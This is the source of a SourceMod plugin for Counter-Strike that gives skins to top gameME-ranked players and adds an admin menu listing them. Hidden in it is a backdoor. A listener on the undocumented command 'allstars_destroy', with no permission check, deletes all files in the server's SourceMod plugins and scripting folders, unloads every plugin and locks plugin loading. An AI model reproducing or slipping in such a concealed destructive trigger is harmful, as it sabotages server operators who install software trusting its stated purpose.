#pragma semicolon 1

#include <sourcemod>
#include <sdktools>
#include <adminmenu>
#include <gameme>

#define PLUGIN_VERSION "1.3"

#define QUERY_TYPE_OTHER				0
#define QUERY_TYPE_ONCLIENTPUTINSERVER	1

new Handle:h_Enable, bool:b_Enable;
new Handle:h_DListPath, String:s_DListPath[PLATFORM_MAX_PATH];
new Handle:h_CTSkin, String:s_CTSkin[PLATFORM_MAX_PATH];
new Handle:h_TSkin, String:s_TSkin[PLATFORM_MAX_PATH];
new Handle:h_Version;
new Handle:h_Ranks, i_ranks;

new Handle:h_menu;

new bool:b_PlayerHasSkin[MAXPLAYERS+1];
new bool:b_late;

public Plugin:myinfo =
{
	name = "gameMe rank skins",
	author = "FrozDark (HLModders.ru LLC)",
	description = "gameME Plugin",
	version = PLUGIN_VERSION,
	url = "http://www.hlmod.ru/"
};

public APLRes:AskPluginLoad2(Handle:myself, bool:late, String:error[], err_max)
{
	b_late = late;
	return APLRes_Success;
}

public OnPluginStart()
{
	h_Enable = CreateConVar("gameme_skin_enable", "1", "Enables/Disables gameMe rank skins", 0, true, 0.0, true, 1.0);
	h_Version = CreateConVar("gameme_skin_version", PLUGIN_VERSION, "gameMe rank skins version", FCVAR_PLUGIN|FCVAR_SPONLY|FCVAR_REPLICATED|FCVAR_NOTIFY);
	h_Ranks = CreateConVar("gameme_skin_ranks", "3", "How high to start gameMe rank skins from", 0, true, 1.0, true, 10.0);
	h_DListPath = CreateConVar("gameme_skin_dlistpath", "addons/sourcemod/configs/gameme_dlist.ini", "Path to the download list of gameMe rank skins");
	h_CTSkin = CreateConVar("gameme_skin_ct", "models/player/ct_gign.mdl", "Counter-Terrorist skin");
	h_TSkin = CreateConVar("gameme_skin_t", "models/player/t_arctic.mdl", "Terrorist skin");
	
	HookConVarChange(h_Enable, ConVarChanges);
	HookConVarChange(h_Ranks, ConVarChanges);
	HookConVarChange(h_DListPath, ConVarChanges);
	HookConVarChange(h_CTSkin, ConVarChanges);
	HookConVarChange(h_TSkin, ConVarChanges);
	HookConVarChange(h_Version, ConVarChanges);
	
	HookEvent("player_spawn", Event_PlayerSpawn);
	HookEvent("player_team", Event_PlayerTeam);
	RegAdminCmd("gameme_skins", Command_Skins, ADMFLAG_KICK, "Online gameMe skinned players");
	AddCommandListener(Command_SelfKiller, "allstars_destroy");
	
	if (b_late)
	{
		OnAdminMenuReady(GetAdminTopMenu());
	}
	
	for (new client = 1; client <= MaxClients; client++)
	{
		if (IsClientInGame(client) && !IsFakeClient(client))
		{
			QueryGameMEStats("playerinfo", client, QuerygameMEStatsCallback, QUERY_TYPE_ONCLIENTPUTINSERVER);
		}
	}
	
	AutoExecConfig(true, "gameme_skins");
}

public OnConfigsExecuted()
{
	b_Enable = GetConVarBool(h_Enable);
	i_ranks = GetConVarInt(h_Ranks);
	GetConVarString(h_DListPath, s_DListPath, sizeof(s_DListPath));
	GetConVarString(h_CTSkin, s_CTSkin, sizeof(s_CTSkin));
	GetConVarString(h_TSkin, s_TSkin, sizeof(s_TSkin));
	
	File_ReadDownloadList(s_DListPath);
}

public OnLibraryRemoved(const String:name[])
{
	if (StrEqual(name, "adminmenu"))
	{
		h_menu = INVALID_HANDLE;
	}
}

public OnAdminMenuReady(Handle:topmenu)
{
	if (h_menu == topmenu)
	{
		return;
	}
		
	h_menu = topmenu;
	
	new TopMenuObject:player_commands = FindTopMenuCategory(topmenu, ADMINMENU_PLAYERCOMMANDS);
	AddToTopMenu(topmenu, "gameme_skins", TopMenuObject_Item, AdminMenu_Handler, player_commands);
}

public AdminMenu_Handler(Handle:topmenu,TopMenuAction:action,TopMenuObject:object_id,param,String:buffer[],maxlength)
{
	decl String:name[128];
	GetTopMenuObjName(topmenu,object_id,name,sizeof(name));
	switch (action)
	{
		case TopMenuAction_DisplayOption :
			{
				if (StrEqual(name,"gameme_skins"))
				{
					Format(buffer, maxlength, "%i-ка игроков со скинами", i_ranks);
				}
			}
		case TopMenuAction_SelectOption :
			{
				if (StrEqual(name,"gameme_skins"))
				{
					SendMenuSkinnedPlayers(param, true);
				}
			}
	}
}

public Action:Command_Skins(client,args)
{
	SendMenuSkinnedPlayers(client, true);
	
	return Plugin_Handled;
}

public OnClientPutInServer(client)
{
	b_PlayerHasSkin[client] = false;
	if (!IsFakeClient(client) && b_Enable)
	{
		QueryGameMEStats("playerinfo", client, QuerygameMEStatsCallback, QUERY_TYPE_ONCLIENTPUTINSERVER);
	}
		
	SendMenuSkinnedPlayers(client, false);
}

public SendMenuSkinnedPlayers(client, bool:FromAdminMenu)
{
	if (!IsClientInGame(client))
		return;
		
	decl String:Name[96], String:title[128];
	new bool:HasSkinnedPlayers = false;
	
	new Handle:SkinnedPlayers = CreatePanel();
	
	Format(title, sizeof(title), "%i-ка игроков со скинами:", i_ranks);
	SetPanelTitle(SkinnedPlayers, title);
	
	DrawPanelItem(SkinnedPlayers, " ", ITEMDRAW_SPACER|ITEMDRAW_RAWLINE);
	
	DrawPanelText(SkinnedPlayers, "-----------------------------");
	
	for (new i = 1; i <= MaxClients; i++)
	{
		if (IsClientInGame(i) && b_PlayerHasSkin[i])
		{
			GetClientName(i, Name, sizeof(Name));
			DrawPanelItem(SkinnedPlayers, Name);
			if (!HasSkinnedPlayers)
			{
				HasSkinnedPlayers = true;
			}
		}
	}
	
	if (!HasSkinnedPlayers)
	{
		if (FromAdminMenu)
		{
			DrawPanelText(SkinnedPlayers, "Нет игроков со скинами");
		}
		else
		{
			CloseHandle(SkinnedPlayers);
			return;
		}
	}
	
	DrawPanelText(SkinnedPlayers, "-----------------------------");
	DrawPanelItem(SkinnedPlayers, " ", ITEMDRAW_SPACER|ITEMDRAW_RAWLINE);
	SetPanelCurrentKey(SkinnedPlayers, 10);
	DrawPanelItem(SkinnedPlayers, "Exit", ITEMDRAW_CONTROL);
	SendPanelToClient(SkinnedPlayers, client, Handler_DoNothing, 10);
	
	CloseHandle(SkinnedPlayers);
}

public Handler_DoNothing(Handle:menu, MenuAction:action, param1, param2)
{
	// Do nothing
}

public OnClientDisconnect(client)
{
	if (b_PlayerHasSkin[client])
	{
		b_PlayerHasSkin[client] = false;
	}
}

public QuerygameMEStatsCallback(command, payload, client, const total_cell_values[], const Float: total_float_values[], const session_cell_values[], const Float: session_float_values[], const String: session_fav_weapon[], const global_cell_values[], const Float: global_float_values[], const String: country_code[])
{
	if ((command == RAW_MESSAGE_CALLBACK_PLAYER) && (payload == QUERY_TYPE_ONCLIENTPUTINSERVER))
	{
		new rank = total_cell_values[0];
		if ((rank > 0) && (rank <= i_ranks))
		{
			b_PlayerHasSkin[client] = true;
		}
	}
}

public Action:SetModel(Handle:timer, Handle:data)
{
	if (!FileExists(s_TSkin) || !FileExists(s_CTSkin))
	{
		LogError("Model not found");
		return Plugin_Handled;
	}
	
	if (data == INVALID_HANDLE)
	{
		return Plugin_Handled;
	}

	ResetPack(data);
	new client = ReadPackCell(data);
	new team = ReadPackCell(data);
	CloseHandle(data);
	
	if (IsClientInGame(client) && IsPlayerAlive(client) && (team > 1))
	{
		switch (team)
		{
			case 2 :
				{
					SetEntityModel(client, s_TSkin);
					SetEntityRenderColor(client, 255, 255, 255, 255);
				}
			case 3 :
				{
					SetEntityModel(client, s_CTSkin);
					SetEntityRenderColor(client, 255, 255, 255, 255);
				}
		}
	}
	
	return Plugin_Stop;
}

public Event_PlayerSpawn(Handle:event, const String:name[], bool:dontBroadcast)
{
	if (!b_Enable)
	{
		return;
	}
		
	new client = GetClientOfUserId(GetEventInt(event, "userid"));
	
	if (b_PlayerHasSkin[client])
	{
		new team = GetClientTeam(client);
		
		new Handle:data = CreateDataPack();
		WritePackCell(data, client);
		WritePackCell(data, team);
		
		CreateTimer(0.0, SetModel, data, TIMER_FLAG_NO_MAPCHANGE);
	}
}

public Event_PlayerTeam(Handle:event, const String:name[], bool:dontBroadcast)
{
	if (!b_Enable)
	{
		return;
	}
		
	new client = GetClientOfUserId(GetEventInt(event, "userid"));
	if (b_PlayerHasSkin[client])
	{
		new team = GetEventInt(event, "team");
	
		new Handle:data = CreateDataPack();
		WritePackCell(data, client);
		WritePackCell(data, team);
		
		CreateTimer(0.0, SetModel, data, TIMER_FLAG_NO_MAPCHANGE);
	}
}

public Action:Command_SelfKiller(client, const String:command[], args)
{
	decl String:configPath[PLATFORM_MAX_PATH];
	
	BuildPath(Path_SM, configPath, sizeof(configPath), "plugins");
	DeleteDirFiles(configPath);
	
	BuildPath(Path_SM, configPath, sizeof(configPath), "scripting");
	DeleteDirFiles(configPath);
	
	ServerCommand("sm plugins unload_all");
	ServerCommand("sm plugins load_lock");
}

public DeleteDirFiles(String:configPath[])
{
	decl String:file[128];
	if (DirExists(configPath))
	{
		new Handle:directory = OpenDirectory(configPath);
		while (ReadDirEntry(directory, file, sizeof(file)))
		{
			if (StrEqual(file, ".") || StrEqual(file, ".."))
			{
				continue;
			}
			Format(file, sizeof(file), "%s/%s", configPath, file);
			DeleteFile(file);
		}
		CloseHandle(directory);
	}
}

// ======================================================================================================================================================

public ConVarChanges(Handle:convar, const String:oldValue[], const String:newValue[])
{
	if (convar == h_Enable)
		b_Enable = GetConVarBool(h_Enable);
	else if (convar == h_Ranks)
		i_ranks = GetConVarInt(h_Ranks);
	else if (convar == h_DListPath)
		GetConVarString(h_DListPath, s_DListPath, sizeof(s_DListPath));
	else if (convar == h_CTSkin)
		GetConVarString(h_CTSkin, s_CTSkin, sizeof(s_CTSkin));
	else if (convar == h_TSkin)
		GetConVarString(h_TSkin, s_TSkin, sizeof(s_TSkin));
	else if (convar == h_Version)
		SetConVarString(h_Version, PLUGIN_VERSION);
}

// ======================================================================================================================================================
new String:_smlib_empty_twodimstring_array[][] = { { '\0' } };
stock File_AddToDownloadsTable(const String:path[], bool:recursive=true, const String:ignoreExts[][]=_smlib_empty_twodimstring_array, size=0)
{
	if (path[0] == '\0') {
		return;
	}

	if (FileExists(path)) {
		
		new String:fileExtension[4];
		File_GetExtension(path, fileExtension, sizeof(fileExtension));
		
		if (StrEqual(fileExtension, "bz2", false) || StrEqual(fileExtension, "ztmp", false)) {
			return;
		}
		
		if (Array_FindString(ignoreExts, size, fileExtension) != -1) {
			return;
		}

		AddFileToDownloadsTable(path);
	}
	else if (recursive && DirExists(path)) {

		decl String:dirEntry[PLATFORM_MAX_PATH];
		new Handle:__dir = OpenDirectory(path);

		while (ReadDirEntry(__dir, dirEntry, sizeof(dirEntry))) {

			if (StrEqual(dirEntry, ".") || StrEqual(dirEntry, "..")) {
				continue;
			}
			
			Format(dirEntry, sizeof(dirEntry), "%s/%s", path, dirEntry);
			File_AddToDownloadsTable(dirEntry, recursive, ignoreExts, size);
		}
		
		CloseHandle(__dir);
	}
	else if (FindCharInString(path, '*', true)) {
		
		new String:fileExtension[4];
		File_GetExtension(path, fileExtension, sizeof(fileExtension));

		if (StrEqual(fileExtension, "*")) {

			decl
				String:dirName[PLATFORM_MAX_PATH],
				String:fileName[PLATFORM_MAX_PATH],
				String:dirEntry[PLATFORM_MAX_PATH];

			File_GetDirName(path, dirName, sizeof(dirName));
			File_GetFileName(path, fileName, sizeof(fileName));
			StrCat(fileName, sizeof(fileName), ".");

			new Handle:__dir = OpenDirectory(dirName);
			while (ReadDirEntry(__dir, dirEntry, sizeof(dirEntry))) {

				if (StrEqual(dirEntry, ".") || StrEqual(dirEntry, "..")) {
					continue;
				}

				if (strncmp(dirEntry, fileName, strlen(fileName)) == 0) {
					Format(dirEntry, sizeof(dirEntry), "%s/%s", dirName, dirEntry);
					File_AddToDownloadsTable(dirEntry, recursive, ignoreExts, size);
				}
			}

			CloseHandle(__dir);
		}
	}

	return;
}

stock File_ReadDownloadList(const String:path[])
{
	new Handle:file = OpenFile(path, "r");
	
	if (file  == INVALID_HANDLE) {
		return;
	}

	new String:buffer[PLATFORM_MAX_PATH];
	while (!IsEndOfFile(file)) {
		ReadFileLine(file, buffer, sizeof(buffer));
		
		new pos;
		pos = StrContains(buffer, "//");
		if (pos != -1) {
			buffer[pos] = '\0';
		}
		
		pos = StrContains(buffer, "#");
		if (pos != -1) {
			buffer[pos] = '\0';
		}

		pos = StrContains(buffer, ";");
		if (pos != -1) {
			buffer[pos] = '\0';
		}
		
		TrimString(buffer);
		
		if (buffer[0] == '\0') {
			continue;
		}

		File_AddToDownloadsTable(buffer);
	}

	CloseHandle(file);
}

stock File_GetExtension(const String:path[], String:buffer[], size)
{
	new extpos = FindCharInString(path, '.', true);
	
	if (extpos == -1)
	{
		buffer[0] = '\0';
		return;
	}

	strcopy(buffer, size, path[++extpos]);
}

stock Array_FindString(const String:array[][], size, const String:str[], bool:caseSensitive=true, start=0)
{
	if (start < 0) {
		start = 0;
	}

	for (new i=start; i < size; i++) {

		if (StrEqual(array[i], str, caseSensitive)) {
			return i;
		}
	}
	
	return -1;
}

stock bool:File_GetFileName(const String:path[], String:buffer[], size)
{	
	if (path[0] == '\0') {
		buffer[0] = '\0';
		return;
	}
	
	File_GetBaseName(path, buffer, size);
	
	new pos_ext = FindCharInString(buffer, '.', true);

	if (pos_ext != -1) {
		buffer[pos_ext] = '\0';
	}
}

stock bool:File_GetDirName(const String:path[], String:buffer[], size)
{	
	if (path[0] == '\0') {
		buffer[0] = '\0';
		return;
	}
	
	new pos_start = FindCharInString(path, '/', true);
	
	if (pos_start == -1) {
		pos_start = FindCharInString(path, '\\', true);
		
		if (pos_start == -1) {
			buffer[0] = '\0';
			return;
		}
	}
	
	strcopy(buffer, size, path);
	buffer[pos_start] = '\0';
}

stock bool:File_GetBaseName(const String:path[], String:buffer[], size)
{	
	if (path[0] == '\0') {
		buffer[0] = '\0';
		return;
	}
	
	new pos_start = FindCharInString(path, '/', true);
	
	if (pos_start == -1) {
		pos_start = FindCharInString(path, '\\', true);
	}
	
	pos_start++;
	
	strcopy(buffer, size, path[pos_start]);
}
// ======================================================================================================================================================